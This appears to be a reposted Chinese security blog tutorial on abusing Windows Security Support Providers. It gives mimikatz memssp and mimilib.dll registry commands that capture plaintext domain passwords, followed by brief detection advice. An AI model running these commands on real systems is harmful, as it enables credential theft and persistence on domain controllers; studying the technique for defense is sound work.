AD域SSP安全防护

admin 2021年4月7日04:31:00评论58 views字数 1712阅读5分42秒阅读模式

一、简介

  SSP(Security Support Provider)是windows操作系统安全机制的提供者。简单的说,SSP就是DLL文件,主要用于windows操作系统的身份认证功能,例如NTLM、Kerberos、Negotiate、Secure Channel(Schannel)、Digest、Credential(CredSSP)

  SSPI(Security Support Provider Interface,安全支持提供程序接口)是windows操作系统在执行认证操作时使用的API接口。可以说SSPI就是SSP的API接口。

    如果获得目标系统system权限,可以使用该方法进行持久化操作。其主要原理是:LSA(Local Security Authority)用于身份验证;lsass.exe作为windows的系统进程,用于本地安全和登录策略;在系统启动时,SSP将被加载到lsass.exe 进程中。但是,假如攻击者对LSA进行了扩展,自定义了恶意的DLL文件,在系统启动时将其加载到lsass.exe进程中,就能够获取lsass.exe进程中的明文密码。这样即使用户更改密码并重新登录,攻击者依然可以获得该账号的新密码。

 

二、实验操作

实验一:

  使用mimikatz将伪造的SSP注入内存,这样做不会在系统中留下二进制文件,但如果域控制器重启,被注入内存的伪造的SSP将会丢失。

 privilege::debug misc::memssp

AD域SSP安全防护

     注销当前用户重新登录,即可获取明文密码,密码存储在日志文件

C:Windowssystem32mimilsa.log中。

type C:Windowssystem32mimilsa.log

AD域SSP安全防护

 

实验二:

  将mimikatz中的mimilib.dll 放到系统的C:Windowssystem32目录下(DLL的位数需要与windows位数相同),并将mimilib.dll添加到注册表中,使用此方法即使系统重启,也不会影响到持久化的效果。

copy mimilib.dll %systemroot%system32

reg query hklmsystemcurrentcontrolsetcontrollsa /v "Security Packages"

reg add "hklmsystemcurrentcontrolsetcontrollsa" /v "Security Packages" /d "kerberosmsv1_0schannelwdigesttspkgpku2umimilib" /t REG_MULTI_SZ

注意:最后一步修改注册表需要在powershell中操作,cmd下会报错。

AD域SSP安全防护

查看注册表hklmsystemcurrentcontrolsetcontrollsaSecurity Packages项的值。

AD域SSP安全防护

系统重启后,若dll被成功加载,用户在登录时输入的账号和密码明文就会被记录在C:Windowssystem32kiwissp.log中。

type C:Windowssystem32kiwissp.log

AD域SSP安全防护

 

参考链接:

https://www.cnblogs.com/websecyw/p/11804624.html

https://www.cnblogs.com/xiaozi/p/11834327.html

 

三、安全防御措施

1.检查注册表hklmsystemcurrentcontrolsetcontrollsaSecurity Packages位置是否存在可疑dll。

AD域SSP安全防护

2.检测%windir%System32 是否有可疑 dll

3.使用第三方工具 Autoruns 检测 LSA中是否存在可疑dll。

Autoruns下载:https://docs.microsoft.com/zh-cn/sysinternals/downloads/autoruns

AD域SSP安全防护


原文链接:https://blog.csdn.net/weixin_41082546/article/details/105930826


如果觉得文章对你有帮助,请支持下点击右下角“在看”

AD域SSP安全防护

本文始发于微信公众号(LemonSec):AD域SSP安全防护

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月7日04:31:00
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   AD域SSP安全防护https://cn-sec.com/archives/304445.html

发表评论

匿名网友 填写信息